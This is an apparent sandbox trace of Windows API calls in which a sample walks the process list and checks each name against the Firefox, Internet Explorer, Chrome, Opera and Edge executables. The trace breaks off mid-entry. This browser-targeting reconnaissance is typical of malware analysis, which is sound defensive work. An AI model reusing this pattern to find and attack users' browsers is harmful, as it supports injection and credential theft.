Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0171.311] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0171.311] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0171.311] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0171.311] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0171.311] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.311] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0171.312] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0171.312] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0171.312] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0171.312] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0171.312] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.312] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0171.313] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0171.313] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0171.313] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0171.313] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0171.313] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.313] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.313] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.313] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.313] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.313] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.313] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.313] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0171.314] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0171.314] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0171.314] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0171.314] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0171.314] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.314] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0171.314] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0171.314] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0171.314] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0171.314] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0171.314] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.315] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0171.315] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0171.315] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0171.315] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0171.315] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0171.315] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.315] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0171.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0171.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0171.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0171.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0171.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.316] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0171.316] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0171.316] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0171.316] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0171.316] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0171.316] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.316] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0171.317] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0171.317] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0171.317] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0171.317] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0171.317] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.317] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0171.318] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0171.318] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0171.318] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0171.318] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0171.318] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.318] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0171.318] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0171.318] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0171.318] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0171.318] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0171.318] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.318] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0171.319] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0171.319] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0171.319] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0171.319] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0171.319] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.319] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0171.319] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0171.319] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0171.319] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0171.319] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0171.319] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.319] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0171.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0171.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0171.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0171.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0171.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.320] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0171.320] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0171.320] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0171.321] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0171.321] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0171.321] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.321] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0171.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0171.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0171.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0171.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0171.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.321] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0171.322] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0171.322] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0171.322] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0171.322] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0171.322] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0171.322] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0171.322] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0171.322] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0171.322] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0171.322] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0171.323] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0171.323] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0171.323] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0171.323] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0171.323] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0171.323] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0171.323] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0171.323] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0171.324] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0171.324] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.324] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0171.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0171.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0171.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0171.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0171.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.324] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0171.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0171.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0171.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0171.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0171.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0171.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0171.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0171.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0171.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0171.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0171.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0171.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0171.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0171.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0171.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0171.326] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0171.326] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0171.326] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0171.327] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0171.327] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0171.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0171.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0171.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0171.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.328] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.328] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.328] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.328] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.328] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0171.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0171.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0171.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0171.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0171.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.329] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.329] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.329] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.329] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.329] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0171.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0171.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0171.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0171.330] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0171.330] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.330] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.330] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.330] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.330] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.330] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.331] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.331] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.331] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.331] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0171.331] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0171.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0171.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0171.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0171.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0171.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0171.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0171.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0171.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0171.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.332] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.332] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.332] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.333] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0171.333] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 